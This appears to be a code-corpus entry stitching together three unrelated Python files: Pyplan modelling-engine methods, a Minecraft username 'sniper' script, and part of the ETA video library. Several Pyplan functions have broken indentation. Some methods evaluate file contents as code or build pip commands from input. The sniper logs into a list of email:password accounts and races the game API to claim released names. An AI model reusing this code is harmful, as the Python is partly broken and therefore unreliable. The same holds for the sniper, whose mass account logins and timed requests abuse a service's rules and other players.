            identifier="pyplan_library", moduleId=self.modelNode.identifier, x=50, y=500, nodeClass="module")
        pyplan_library_node.title = "Pyplan library"
        pyplan_library_node.color = "#9fc5e8"
        pyplan_library_node.nodeInfo["showInputs"] = 0
        pyplan_library_node.nodeInfo["showOutputs"] = 0
    # Nodo default imports
    importNode = None
    if self.existNode("imports"):
        importNode = self.getNode("imports")
    else:
        importNode = self.createNode(
            identifier="imports", moduleId="pyplan_library", x=200, y=100)
        importNode.title = "Default imports"
        importNode.definition = """import numpy, pandas, cubepy, xarray
#fill the following dict keys with the alias you want to define for each Library
result = {
"np":numpy,
"pd":pandas,
"cubepy":cubepy,
"xr":xarray
}"""
    # Relocate a pre-existing imports node into the library module.
    if importNode.moduleId != "pyplan_library":
        importNode.moduleId = "pyplan_library"
        importNode.x = 103
        importNode.y = 190
def isLinux(self):
    """Return True on 'linux'/'linux2'/'darwin' platforms (macOS counts as Linux here)."""
    return platform in ("linux", "linux2", "darwin")
# profileNode
def profileNode(self, nodeId):
    """Perform profile of an node.

    Runs the node's profiler, then rewrites the report so calcTime holds
    each node's own time (evaluation minus attributable input time) and
    evaluationTime the accumulated total. Returns the report encoded with
    jsonpickle.
    """
    # Aliases/form nodes: profile the original node instead.
    if self.getNode(nodeId).originalId is not None:
        nodeId = self.getNode(nodeId).originalId
    profile = self.getNode(nodeId).profileNode([], [], self.getNode(nodeId).evaluationVersion, nodeId)
    for node in profile:
        if self.nodeDic[node["nodeId"]].isCircular():
            # Circular nodes: input time cannot be attributed, keep full time.
            node["calcTime"] = node["evaluationTime"]
        else:
            inputsTime = 0
            for nodeInput in self.getNode(node["nodeId"]).inputs:
                # Only inputs evaluated in this same run and attributed to
                # this node count against its own time.
                if(self.getNode(node["nodeId"]).evaluationVersion == self.getNode(nodeInput).evaluationVersion and node["nodeId"] == self.getNode(nodeInput).profileParent):
                    inputsTime = inputsTime + self.getNode(nodeInput).lastEvaluationTime
            node["calcTime"] = node["evaluationTime"] - inputsTime
            if node["calcTime"] < 0:
                node["calcTime"] = 0
    # Fix acumulated time: walk the report bottom-up accumulating calcTime.
    total_time = 0
    for nn in reversed(range(len(profile))):
        node = profile[nn]
        total_time = total_time + node["calcTime"]
        node["evaluationTime"] = total_time
    return jsonpickle.encode(profile)
def evaluate(self, definition, params=None):
    """Evaluate a Python *definition* in a throw-away node and return its result."""
    scratch = BaseNode(
        model=self, identifier="__evalnode__", nodeClass="variable")
    scratch._definition = definition
    scratch.calculate(params)
    value = scratch.result
    scratch.release()
    return value
def callFunction(self, nodeId, params=None):
    """Call the function stored as *nodeId*'s result, with optional keyword *params*.

    Returns None when the node does not exist.
    """
    if not self.existNode(nodeId):
        return None
    fn = self.getNode(nodeId).result
    return fn() if params is None else fn(**params)
def getIdentifierByNode(self, result):
    """Return the id of the first calculated node whose result IS *result* ("" if none)."""
    for node_id, node in self.nodeDic.items():
        if node.isCalc and node.result is result:
            return node_id
    return ""
def loadScenario(self, nodeId, scenarioData):
    """ Load and fill scenarioDic.

    *scenarioData* is a "##"-separated list of "id||name||file" entries;
    id "-1" means the node's current result, otherwise the stored
    definition file is evaluated. The results are stacked along the
    '_scenario_' index and stored in self._scenarioDic[nodeId]. Returns
    True when a scenario was loaded.
    """
    res = False
    if not scenarioData is None:
        if self.existNode(nodeId):
            scenarioResult = []
            scenarioNames = []
            scenList = str(scenarioData).split("##")
            for scenItem in scenList:
                arr = str(scenItem).split("||")
                if len(arr) == 3:
                    scenarioName = arr[1]
                    fileName = arr[2]
                    _result = None
                    if arr[0] == "-1":  # current
                        _result = self.getNode(nodeId).result
                    else:
                        # Saved scenario: evaluate the stored definition.
                        nodeDef = ""
                        with open(fileName, 'r') as f:
                            nodeDef = f.read()
                            f.close()
                        _result = self.evaluate(nodeDef)
                    scenarioResult.append(_result)
                    scenarioNames.append(scenarioName)
            # fill scenario node with the collected scenario names
            scenarioIndex = self.getNode("_scenario_")
            scenarioIndex.definition = "result = pp.index(['" + "','".join(
                scenarioNames) + "'])"
            if len(scenarioResult) > 0:
                finalResult = None
                if isinstance(scenarioResult[0], xr.DataArray):
                    # DataArray results: concatenate along the scenario dim.
                    finalResult = xr.concat(
                        scenarioResult, scenarioIndex.result.dataArray)
                else:
                    # Scalar/other results: wrap in a new scenario-indexed array.
                    finalResult = xr.DataArray(
                        scenarioResult, scenarioIndex.result.coord)
                self._scenarioDic[nodeId] = finalResult
                res = True
    return res
def unloadScenario(self):
    """Drop every loaded scenario and reset the '_scenario_' index to Current."""
    for key in self._scenarioDic:
        # Release references before discarding the dict.
        self._scenarioDic[key] = None
    self._scenarioDic = dict()
    self.getNode("_scenario_").definition = "result = pp.index(['Current'])"
def geoUnclusterData(self, nodeId, rowIndex, attIndex, latField="latitude", lngField="longitude", geoField="geoField", labelField="labelField", sizeField="sizeField", colorField="colorField", iconField="iconField"):
    """Return unclustered data for geo representation.

    Returns "" when the node has no result and None when it does not exist.
    Bumps the model's evaluationVersion before delegating to the evaluator.
    """
    if not self.existNode(nodeId):
        return None
    value = self.nodeDic[nodeId].result
    if value is None:
        return ""
    self.evaluationVersion += 1
    evaluator = Evaluator.createInstance(value)
    return evaluator.geoUnclusterData(value, self.nodeDic, nodeId, rowIndex, attIndex,
                                      latField, lngField, geoField, labelField,
                                      sizeField, colorField, iconField)
def getToolbars(self, extraPath):
    """Load the default toolbar definitions and rebuild the node-class map.

    Reads extras/toolbars.json next to this module; returns the decoded
    toolbar groups (empty list when the file is missing).
    """
    self._nodeClassDic = {}
    toolbars = []
    toolbar_file = os.path.join(
        os.path.dirname(os.path.realpath(__file__)), "extras", "toolbars.json")
    if os.path.isfile(toolbar_file):
        with open(toolbar_file, 'r') as f:
            toolbars = jsonpickle.decode(f.read())
    for group in toolbars:
        for item in group["items"]:
            item["baseClass"] = item["format"]["nodeClass"]
            self._nodeClassDic[item["nodeClass"]] = item["format"]
    return toolbars
def callWizard(self, param):
    """Decode a wizard request and dispatch its action on the (cached) wizard.

    *param* is a jsonpickle payload with "wizard", "action" and "params".
    The wizard instance is reused while its code matches the request.
    """
    request = jsonpickle.decode(param)
    wizard_key = request["wizard"]
    action = request["action"]
    params = request["params"]
    if self._wizard is None or self._wizard.code != wizard_key:
        self._wizard = self._getWizzard(wizard_key)
    handler = getattr(self._wizard, action)
    return handler(self, params)
def createNewModel(self, modelFile, modelName):
    """Release current state and create a fresh model named *modelName*.

    System nodes are created for *modelFile*'s location and the new model
    is saved there. Always returns True.
    """
    self.release()
    self._modelProp = {}
    self._isLoadingModel = True
    self.initialize(modelName)
    self.createSystemNodes(modelFile)
    self._isLoadingModel = False
    self.saveModel(modelFile)
    return True
def _getWizzard(self, key):
key = key.lower()
if key == 'calculatedfield':
return CalculatedField.Wizard()
elif key == 'selectcolumns':
return SelectColumns.Wizard()
elif key == 'selectrows':
return SelectRows.Wizard()
elif key == 'sourcecsv':
return sourcecsv.Wizard()
elif key == 'dataframeindex':
return DataframeIndex.Wizard()
elif key == 'dataframegroupby':
return DataframeGroupby.Wizard()
def getSystemResources(self):
    """Return current system resources (memory, CPU, pid, current node).

    Reads cgroup v1 accounting files, so this only works inside a
    container that mounts /sys/fs/cgroup. Memory figures are in GB; CPU
    is a 0-100 usage percentage sampled over 0.3 s.
    """
    def _read_int(file):
        # Read a single integer from a cgroup/proc file.
        data = 0
        with open(file, 'r') as f:
            data = int(f.read())
            f.close()
        return data

    def _read_cache():
        # First line of memory.stat is "cache <bytes>".
        data = 0
        with open('/sys/fs/cgroup/memory/memory.stat', 'r') as f:
            line = f.readline()
            data = int(str(line).split(" ")[1])
            f.close()
        return data
    mem_limit = _read_int(
        '/sys/fs/cgroup/memory/memory.limit_in_bytes') / 1024/1024/1024
    if mem_limit > 200:  # bug for container whitout limit
        # No real cgroup limit: fall back to the host MemTotal (kB) from /proc/meminfo.
        total_host = ""
        with open('/proc/meminfo', 'r') as f:
            line1 = f.readline()
            total_host = str(line1).split(" ")[-2:-1][0]
            mem_limit = int(total_host) / 1024/1024
    # Used memory excludes the page cache reported by the cgroup.
    mem_used = (_read_int(
        '/sys/fs/cgroup/memory/memory.usage_in_bytes') - _read_cache()) / 1024/1024/1024
    # get cpu usage: sample cumulative cpuacct.usage (ns) twice, 0.3 s apart
    time_1 = datetime.datetime.now()
    cpu_time_1 = _read_int('/sys/fs/cgroup/cpu/cpuacct.usage')
    sleep(0.3)
    time_2 = datetime.datetime.now()
    cpu_time_2 = _read_int('/sys/fs/cgroup/cpu/cpuacct.usage')
    delta_time = (time_2 - time_1).microseconds * 10
    used_cpu = (cpu_time_2 - cpu_time_1) / delta_time
    used_cpu = used_cpu if used_cpu < 100 else 100  # clamp to 100%
    current_node = self._currentProcessingNode
    if self.existNode(current_node):
        node = self.getNode(current_node)
        if node.title:
            current_node = f"{node.title} ({current_node})"
    return {
        "totalMemory": mem_limit,
        "usedMemory": mem_used,
        "usedCPU": used_cpu,
        "pid": self.getPID(),
        "currentNode": current_node
    }
    def installLibrary(self, lib, target):
        """Install a python library via pip in a background thread.

        Args:
            lib: pip requirement specifier to install.
            target: unused here; presumably a target directory -- confirm.

        Returns:
            "ok" immediately; progress lines accumulate in
            self._currentInstallProgress (see getInstallProgress).
        """
        self._currentInstallProgress = []
        def _install(command):
            # stream pip's stdout line by line into the progress buffer
            p = subprocess.Popen(split(command), stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE, universal_newlines=True)
            nn = 0
            while p.stdout is not None and nn < 120:
                line = p.stdout.readline()
                if not line:
                    p.stdout.flush()
                    aa,err = p.communicate()
                    if err:
                        self._currentInstallProgress.append(err.rstrip('\n'))
                    break
                    # NOTE(review): the two lines below are unreachable after
                    # `break`, so nn never increments -- confirm intent
                    sleep(1)
                    nn += 1
                self._currentInstallProgress.append(line.rstrip('\n'))
            # make newly installed packages importable without restart
            importlib.invalidate_caches()
        cmd = f"pip install {lib}"
        # If there are proxy configurations, use them to install from pip
        http_proxy = os.getenv('PYPLAN_HTTP_PROXY')
        https_proxy = os.getenv('PYPLAN_HTTPS_PROXY')
        if http_proxy:
            cmd += f' --proxy {http_proxy}'
        elif https_proxy:
            cmd += f' --proxy {https_proxy}'
        thread = threading.Thread(target=_install, args=(cmd,))
        thread.start()
        return "ok"
def getInstallProgress(self, from_line):
"""Return install library progress"""
from_line = int(from_line)
if len(self._currentInstallProgress) == 0 or from_line > len(self._currentInstallProgress):
return []
else:
return self._currentInstallProgress[from_line:]
    def setNodeIdFromTitle(self,node_id):
        """Generate node id from node identifier """
        # When the model allows identifier changes (the default), derive a
        # new identifier from the node's title and apply it
        res = {"node_id":node_id}
        model_props = self.getModelProperties()
        if (not "changeIdentifier" in model_props or model_props["changeIdentifier"]=="1") and self.existNode(node_id):
            node = self.nodeDic[node_id]
            new_id = ""
            try:
                if node.title:
                    new_id = self._removeDiacritics(node.title)
            except Exception as ex:
                raise ValueError(f'Error finding node title: {str(ex)}')
            if new_id:
                # avoid collisions with existing node identifiers
                if self.existNode(new_id):
                    new_id = self.getNextIdentifier(new_id)
                node.identifier = new_id
                res["node_id"] = new_id
        return res
def _removeDiacritics(self, text):
"""Removes all diacritic marks from the given string"""
norm_txt = unicodedata.normalize('NFD', text)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
# remove accents and other diacritics, replace spaces with "_" because identifiers can't have spaces
no_spaces = unicodedata.normalize('NFC', shaved).lower().replace(" ", "_")
final_text = no_spaces
# only allow [a-z], [0-9] and _
p = re.compile('[a-z0-9_]+')
for i in range(0, len(no_spaces)):
if not (p.match(no_spaces[i])):
final_text = final_text[:i] + '_' + final_text[i+1:]
# i the first char is not a-z then replaceit (all identifiers must start with a letter)
p2 = re.compile('[a-z]+')
if not p2.match(final_text[0]):
final_text = 'a' + final_text[1:]
return final_text
|
artemis.py | # Standard Library imports
import socket, ssl, datetime, threading, time, sys, subprocess
try:
import requests
import msmcauth
import fade
from colorama import Fore
from discord_webhook import DiscordWebhook, DiscordEmbed
except ImportError:
print("Installing dependencies... (requirements.txt)")
# sys.executable -m pip install -r requirements.txt (silenced stdout)
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt'], stderr=subprocess.STDOUT, stdout=subprocess.DEVNULL)
# import again
import requests
import msmcauth
import fade
from colorama import Fore
from discord_webhook import DiscordWebhook, DiscordEmbed
WEBHOOK_URL = ""
accdata = []
output = []
def nameChangeAllowed(bearer) -> bool:
    """Return True if the account behind *bearer* may change its name.

    Queries the Mojang namechange endpoint. Returns False on an invalid
    JSON response or a payload lacking the "nameChangeAllowed" key
    (previously a missing key raised an unhandled KeyError).
    """
    try:
        data = requests.get(
            "https://api.minecraftservices.com/minecraft/profile/namechange",
            headers={"Authorization": "Bearer " + bearer},
        ).json()
        return bool(data.get("nameChangeAllowed", False))
    except requests.exceptions.JSONDecodeError:
        return False
def auto_ping(number_of_pings):
    """Estimate one-way latency (ms) to api.minecraftservices.com.

    Sends *number_of_pings* dummy HTTPS PUT requests over a single TLS
    socket and returns the average round-trip time divided by two, in
    milliseconds.
    """
    delays = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as so:
        so.connect(('api.minecraftservices.com', 443))
        context = ssl.create_default_context()
        ssock = context.wrap_socket(
            so, server_hostname='api.minecraftservices.com')
        for _ in range(number_of_pings):
            start = time.time()
            ssock.send(bytes(
                "PUT /minecraft/profile/name/TEST HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer " + "TEST_TOKEN\r\n\r\n",
                "utf-8"))
            # block until the server answers so the delay covers a full RTT
            ssock.recv(10000).decode('utf-8')
            delays.append(time.time() - start)
    return (sum(delays) / len(delays) * 1000 / 2)
def countdown_time(count):
    """Print an in-place (carriage-return) countdown of *count* seconds."""
    remaining = int(count)
    while remaining > 0:
        minutes, seconds = divmod(remaining, 60)
        if minutes > 59:
            hours, minutes = divmod(minutes, 60)
            print(f"Generating Connection & Threads 😴 ~~ {'0' if hours < 10 else ''}{hours}:{'0' if minutes < 10 else ''}{minutes}:{'0' if seconds < 10 else ''}{seconds}", end="\r")
        elif minutes:
            print(f"Generating Connection & Threads 😫 ~~ {'0' if minutes < 10 else ''}{minutes}:{'0' if seconds < 10 else ''}{seconds} ", end="\r")
        else:
            print(f"Generating Connection & Threads 👀 ~~ {seconds}s ", end="\r")
        time.sleep(1)
        remaining -= 1
# Check acc type
def isGC(bearer) -> bool:
    """Return True if the token belongs to a Game Pass account.

    A 404 from the namechange endpoint means the account has no Minecraft
    profile yet, which is how Game Pass accounts present before first login.
    """
    headers = {"Authorization": f"Bearer {bearer}"}
    response = requests.get(
        "https://api.minecraftservices.com/minecraft/profile/namechange",
        headers=headers)
    return response.status_code == 404
# EP Requests
def req(acc):
    """Fire one pre-built request over raw TLS and record the raw response.

    Appends (first 423 response bytes, completion timestamp) to the global
    `output` list for later analysis in success_true().
    """
    # With closes socket connection
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect(('api.minecraftservices.com', 443))
        context = ssl.create_default_context()
        ss = context.wrap_socket(
            s, server_hostname='api.minecraftservices.com')
        ss.send(bytes(f'{acc["payload"]}\r\n\r\n', 'utf-8'))
        # 423 bytes is enough to capture the status line and headers
        output.append((ss.recv(423), time.time()))
# On Success
def success_true(token_list):
    """Report the snipe outcome after all request threads have run.

    Waits for outstanding threads, then walks the global `output` (sorted by
    completion time) printing each HTTP status; on a 200 it looks up which
    account now owns the target name, applies a skin, and fires the Discord
    webhook.

    NOTE(review): relies on the module-level `t` (the last thread started in
    __main__) and the globals `output`/`target_name`/`WEBHOOK_URL`.
    """
    t.join()
    threads = threading.active_count() - 1
    while threads:
        threads = threading.active_count() - 1
        print(f"Waiting for {threads} thread(s) to finish...")
        time.sleep(0.5)  # Wait until threads terminate
    # Sort Times
    output.sort(key=lambda time: time[1])
    for outs in output:
        # the HTTP status code sits at bytes 9-12 of the status line
        status_code = outs[0].decode("utf-8")[9:12]
        if status_code.isnumeric() and int(status_code) == 200:
            print(f"[{Fore.GREEN}{status_code}{Fore.RESET}] ~ {datetime.datetime.utcfromtimestamp(outs[1]).strftime('%S.%f')}")
            for token in token_list:
                headers = {"Authorization": f"Bearer {token.get('bearer')}"}
                username = requests.get(
                    "https://api.minecraftservices.com/minecraft/profile",
                    headers=headers,
                ).json()["name"]
                if username == target_name:
                    print(f"🎉 Sniped {Fore.MAGENTA}{target_name}{Fore.RESET} 🎉")
                    skin_change = requests.post(
                        "https://api.minecraftservices.com/minecraft/profile/skins",
                        json={
                            "variant": "classic",
                            "url": "https://i.imgur.com/8nuxlIk.png",
                        },
                        headers=headers,
                    )
                    if skin_change.status_code == 200:
                        print(f"{Fore.MAGENTA}Successfully delivered skin change{Fore.RESET}")
                    else:
                        print(f"{Fore.YELLOW}Failed to deliver skin change{Fore.RESET}")
                    try:
                        webhook = DiscordWebhook(url=WEBHOOK_URL, rate_limit_retry=True)
                        embed = DiscordEmbed(title="NameMC", url=f'https://namemc.com/search?q={target_name}',
                                             description=f"**Sniped `{target_name}` :ok_hand:**", color=12282401)
                        embed.set_thumbnail(
                            url='https://cdn.discordapp.com/icons/944338449140420690/eaf9e293982fe84b1bb5ff08f40a17f9.webp?size=1024')
                        webhook.add_embed(embed)
                        webhook.execute()
                        print(f"{Fore.MAGENTA}Successfully executed webhook{Fore.RESET}")
                    except requests.exceptions.MissingSchema:
                        print(f"{Fore.YELLOW}No webhook url specified{Fore.RESET}")
                    except requests.exceptions.ConnectionError:
                        print(f"{Fore.YELLOW}Failed to execute webhook{Fore.RESET}")
        else:
            print(f"[{Fore.RED}{status_code}{Fore.RESET}] ~ {datetime.datetime.utcfromtimestamp(outs[1]).strftime('%S.%f')}")
if __name__ == "__main__":
    try:
        # remove duplicates
        with open("accs.txt", "r+") as file:
            accs = "\n".join(set(file.read().splitlines()))
            file.seek(0)
            file.truncate()
            file.write(accs)
        # Start main
        print(fade.purplepink(f"""
 ########## # ######### ###### ##########
 # ## ######### ####### ########## # # # #
 # # # # # # # ########## #
 # # # # # # ######## # #
 # # # ########## # # # # #
 # ######### # # # # ##
 # # # ######## #### ##
 a r t e m i s"""))
        print("Blessed by the Goddess - Artemis\n")
        # prompt until a target name is supplied
        target_name = input("% Name ~> ")
        while not target_name:
            target_name = input("% Name ~> ")
        # measured one-way latency used to send requests slightly early
        auto_offset = auto_ping(5)
        offset = float(input(f"\n% Offset [{auto_offset:.2f}ms] ~> ") or auto_offset)
        droptime = requests.get(f"http://api.star.shopping/droptime/{target_name}", headers={"User-Agent": "Sniper"}).json()
        if droptime.get("unix"):
            droptime = droptime["unix"] - (offset / 1000)
        else:
            # API didn't know the drop time; fall back to manual entry
            print(f"\n{Fore.RED}ERROR: \"{droptime['error'].capitalize()}\"{Fore.RESET}")
            droptime = input(f"\n% {target_name} Unix Droptime ~> {Fore.RESET}")
            while not droptime:
                droptime = input(f"\n% {target_name} Unix Droptime ~> {Fore.RESET}")
            droptime = int(droptime)
        # authenticate every email:password pair in accs.txt
        with open("accs.txt") as file:
            for line in file.read().splitlines():
                if not line.strip():
                    continue
                splitter = line.split(":")
                if len(splitter) != 2:
                    print(f"{Fore.LIGHTYELLOW_EX}Invalid account ~ \"{line}\"{Fore.RESET}")
                    continue
                email, password = splitter
                try:
                    if (msresp := msmcauth.login(email, password).access_token) and isGC(msresp):
                        # Gc auth
                        print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [GC]")
                        accdata.append({"reqamount": 2, "bearer": msresp,
                                        "payload": f"POST /minecraft/profile HTTP/1.1\r\nHost: api.minecraftservices.com\r\nprofileName: {target_name}\r\nAuthorization: Bearer {msresp}"})
                    else:
                        # Microsoft auth
                        if not nameChangeAllowed(msresp):
                            print(f"{Fore.YELLOW}{email} cannot namechange{Fore.RESET}")
                            continue
                        accdata.append({"reqamount": 4, "bearer": msresp,
                                        "payload": f"PUT /minecraft/profile/name/{target_name} HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer {msresp}"})
                        print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [MS]")
                except:
                    # Mojang auth -- any failure above falls through to here
                    auth = requests.post("https://authserver.mojang.com/authenticate",
                                         json={"username": email, "password": password})
                    try:
                        auth_result = auth.json()
                        if auth.status_code == 200 and auth_result:
                            if not nameChangeAllowed(auth_result['accessToken']):
                                print(f"{Fore.YELLOW}{email} cannot namechange{Fore.RESET}")
                                continue
                            accdata.append({"reqamount": 4, "bearer": auth_result['accessToken'],
                                            "payload": f"PUT /minecraft/profile/name/{target_name} HTTP/1.1\r\nHost: api.minecraftservices.com\r\nAuthorization: Bearer {auth_result['accessToken']}"})
                            print(f"Authenticated {Fore.MAGENTA}{email}{Fore.RESET} ~ [MJ]")
                        else:
                            raise Exception
                    except:
                        print(f"{Fore.YELLOW}[{auth.status_code}] ~ {email} failed to authenticate{Fore.RESET}")
        if not accdata:
            sys.exit(f"{Fore.RED}No accounts valid...{Fore.RESET}")
        # Prepare Sleep
        try:
            countdown_time((droptime - time.time()) - 8)
        except ValueError:
            pass
        #Generating Threads Before Droptime
        # NOTE(review): `threads` is rebuilt on every loop pass, so only the
        # last account's threads survive to be started below -- confirm
        # whether the per-account lists should instead be accumulated
        for acc_data in accdata:
            threads = [threading.Thread(target=req, args=(acc_data,)) for _ in range(acc_data.get("reqamount"))]
        time.sleep(droptime - time.time())
        for t in threads:
            t.start()
        success_true(accdata)
    finally:
        input("\n\n\nPress enter to exit...")
|
video.py | """
Core tools and data structures for working with videos.
Notes::
[frame numbers] ETA uses 1-based indexing for all frame numbers
[image format] ETA stores images exclusively in RGB format. In contrast,
OpenCV stores its images in BGR format, so all images that are read or
produced outside of this library must be converted to RGB. This
conversion can be done via `eta.core.image.bgr_to_rgb()`
Copyright 2017-2021, Voxel51, Inc.
voxel51.com
"""
# pragma pylint: disable=redefined-builtin
# pragma pylint: disable=unused-wildcard-import
# pragma pylint: disable=wildcard-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import *
from future.utils import iteritems, itervalues
# pragma pylint: enable=redefined-builtin
# pragma pylint: enable=unused-wildcard-import
# pragma pylint: enable=wildcard-import
from copy import deepcopy
import errno
import logging
import os
from subprocess import Popen, PIPE
import threading
import cv2
import dateutil.parser
import numpy as np
from sortedcontainers import SortedDict
import eta.core.data as etad
import eta.core.events as etae
from eta.core.frames import FrameLabels, FrameLabelsSchema
import eta.core.frameutils as etaf
import eta.core.gps as etag
import eta.core.image as etai
import eta.core.labels as etal
import eta.core.objects as etao
import eta.core.serial as etas
import eta.core.utils as etau
logger = logging.getLogger(__name__)
#
# The file extensions of supported video files. Use LOWERCASE!
#
# In practice, any video that ffmpeg can read will be supported. Nonetheless,
# we enumerate this list here so that the ETA type system can verify the
# extension of a video provided to a pipeline at build time.
#
# This list was taken from https://en.wikipedia.org/wiki/Video_file_format
# with additions from other places on an ad-hoc basis
#
# NOTE: ".m2ts" and ".mts" previously appeared twice; duplicates removed and
# the entries sorted for easier maintenance (set contents are unchanged)
SUPPORTED_VIDEO_FILE_FORMATS = {
    ".3g2",
    ".3gp",
    ".amv",
    ".avi",
    ".f4a",
    ".f4b",
    ".f4p",
    ".f4v",
    ".flv",
    ".m2ts",
    ".m2v",
    ".m4p",
    ".m4v",
    ".mkv",
    ".mov",
    ".mp2",
    ".mp4",
    ".mpe",
    ".mpeg",
    ".mpg",
    ".mpv",
    ".mts",
    ".nsv",
    ".ogg",
    ".ogv",
    ".qt",
    ".rm",
    ".rmvb",
    ".svi",
    ".ts",
    ".tsa",
    ".tsv",
    ".vob",
    ".webm",
    ".wmv",
    ".yuv",
}
def is_video_mime_type(filepath):
    """Determines whether the given file has a `video` MIME type.

    Args:
        filepath: the path to the file

    Returns:
        True/False
    """
    mime_type = etau.guess_mime_type(filepath)
    return mime_type.startswith("video")
def is_supported_video(path):
    """Determines whether the given filepath points to a supported video.

    Args:
        path: the path to a video, like `/path/to/video.mp4` or
            `/path/to/frames-%05d.jpg`

    Returns:
        True/False if the path refers to a supported video type
    """
    if is_supported_video_file(path):
        return True
    return is_supported_image_sequence(path)
def is_supported_video_file(path):
    """Determines whether the given filepath points to a supported video file
    type.

    Args:
        path: the path to a video file, like `/path/to/video.mp4`

    Returns:
        True/False if the path refers to a supported video file type
    """
    ext = os.path.splitext(path)[1]
    return ext.lower() in SUPPORTED_VIDEO_FILE_FORMATS
def is_supported_image_sequence(path):
    """Determines whether the given filepath points to a supported image
    sequence type.

    Args:
        path: the path to an image sequence, like `/path/to/frames-%05d.jpg`

    Returns:
        True/False if the path refers to a supported video file type
    """
    try:
        # `path % 1` only succeeds when the path contains a printf-style
        # numeric pattern like %05d; a plain string raises TypeError
        _ = path % 1
        return etai.is_supported_image(path)
    except TypeError:
        return False
def is_same_video_file_format(path1, path2):
    """Determines whether the video files have the same supported format.

    Args:
        path1: the path to a video
        path2: the path to a video

    Returns:
        True/False
    """
    same_ext = os.path.splitext(path1)[1] == os.path.splitext(path2)[1]
    return is_supported_video(path1) and same_ext
def is_valid_video_file(path):
    """Determines if the given video file is valid, i.e., it has a supported
    type and can be read by our system.

    This method does not support videos represented as image sequences (i.e.,
    it will return False for them).

    Args:
        path: the path to a video file

    Returns:
        True/False if the video is valid
    """
    if not is_supported_video_file(path):
        return False
    try:
        # opening the reader forces ffmpeg to probe the file; an unreadable
        # file surfaces as ExecutableRuntimeError
        with FFmpegVideoReader(path):
            return True
    except etau.ExecutableRuntimeError:
        return False
def glob_videos(dir_):
    """Returns an iterator over all supported video files in the directory."""
    root = os.path.join(dir_, "*")
    return etau.multiglob(*SUPPORTED_VIDEO_FILE_FORMATS, root=root)
class VideoMetadata(etas.Serializable):
    """Class encapsulating metadata about a video.

    Attributes:
        start_time: (optional) a datetime describing the start (world) time of
            the video
        frame_size: the [width, height] of the video frames
        frame_rate: the frame rate of the video
        total_frame_count: the total number of frames in the video
        duration: the duration of the video, in seconds
        size_bytes: the size of the video file on disk, in bytes
        mime_type: the MIME type of the video
        encoding_str: the encoding string for the video
        gps_waypoints: (optional) a GPSWaypoints instance describing the GPS
            coordinates for the video
    """
    def __init__(
        self,
        start_time=None,
        frame_size=None,
        frame_rate=None,
        total_frame_count=None,
        duration=None,
        size_bytes=None,
        mime_type=None,
        encoding_str=None,
        gps_waypoints=None,
    ):
        """Creates a VideoMetadata instance.

        Args:
            start_time: (optional) a datetime describing the start (world) time
                of the video
            frame_size: the [width, height] of the video frames
            frame_rate: the frame rate of the video
            total_frame_count: the total number of frames in the video
            duration: the duration of the video, in seconds
            size_bytes: the size of the video file on disk, in bytes
            mime_type: the MIME type of the video
            encoding_str: the encoding string for the video
            gps_waypoints: (optional) a GPSWaypoints instance describing the
                GPS coordinates for the video
        """
        self.start_time = start_time
        self.frame_size = frame_size
        self.frame_rate = frame_rate
        self.total_frame_count = total_frame_count
        self.duration = duration
        self.size_bytes = size_bytes
        self.mime_type = mime_type
        self.encoding_str = encoding_str
        self.gps_waypoints = gps_waypoints
    @property
    def aspect_ratio(self):
        """The aspect ratio (width / height) of the video."""
        width, height = self.frame_size
        return width * 1.0 / height
    @property
    def has_gps(self):
        """Whether this object has GPS waypoints."""
        return self.gps_waypoints is not None
    def get_timestamp(self, frame_number=None, world_time=None):
        """Gets the timestamp for the given point in the video.

        Exactly one keyword argument must be supplied.

        Args:
            frame_number: the frame number of interest
            world_time: a datetime describing the world time of interest

        Returns:
            the timestamp (in seconds) in the video
        """
        if world_time is not None:
            timestamp = etaf.world_time_to_timestamp(
                world_time, self.start_time
            )
            # NOTE(review): this branch returns a *frame number*, despite the
            # method name and docstring promising a timestamp -- confirm
            # whether it should simply return `timestamp`
            return etaf.timestamp_to_frame_number(
                timestamp, self.duration, self.total_frame_count
            )
        return etaf.frame_number_to_timestamp(
            frame_number, self.total_frame_count, self.duration
        )
    def get_frame_number(self, timestamp=None, world_time=None):
        """Gets the frame number for the given point in the video.

        Exactly one keyword argument must be supplied.

        Args:
            timestamp: the timestamp (in seconds or "HH:MM:SS.XXX" format) of
                interest
            world_time: a datetime describing the world time of interest

        Returns:
            the frame number in the video
        """
        if world_time is not None:
            return etaf.world_time_to_frame_number(
                world_time,
                self.start_time,
                self.duration,
                self.total_frame_count,
            )
        return etaf.timestamp_to_frame_number(
            timestamp, self.duration, self.total_frame_count
        )
    def get_gps_location(
        self, frame_number=None, timestamp=None, world_time=None
    ):
        """Gets the GPS location at the given point in the video.

        Exactly one keyword argument must be supplied.

        Nearest neighbors is used to interpolate between waypoints.

        Args:
            frame_number: the frame number of interest
            timestamp: the timestamp (in seconds or "HH:MM:SS.XXX" format) of
                interest
            world_time: a datetime describing the absolute (world) time of
                interest

        Returns:
            the (lat, lon) at the given frame in the video, or None if the
            video has no GPS waypoints
        """
        if not self.has_gps:
            return None
        # normalize whichever argument was given down to a frame number
        if world_time is not None:
            timestamp = self.get_timestamp(world_time=world_time)
        if timestamp is not None:
            frame_number = self.get_frame_number(timestamp=timestamp)
        return self.gps_waypoints.get_location(frame_number)
    def attributes(self):
        """Returns the list of class attributes that will be serialized."""
        _attrs = [
            "start_time",
            "frame_size",
            "frame_rate",
            "total_frame_count",
            "duration",
            "size_bytes",
            "mime_type",
            "encoding_str",
            "gps_waypoints",
        ]
        # only serialize fields that are actually set
        return [a for a in _attrs if getattr(self, a) is not None]
    @classmethod
    def build_for(cls, video_path, verbose=False):
        """Builds a VideoMetadata instance for the given video.

        Args:
            video_path: the path to the video
            verbose: whether to generously log the process of extracting the
                video metadata. By default, this is False

        Returns:
            a VideoMetadata instance
        """
        vsi = VideoStreamInfo.build_for(video_path, verbose=verbose)
        metadata = cls.from_stream_info(vsi)
        if verbose:
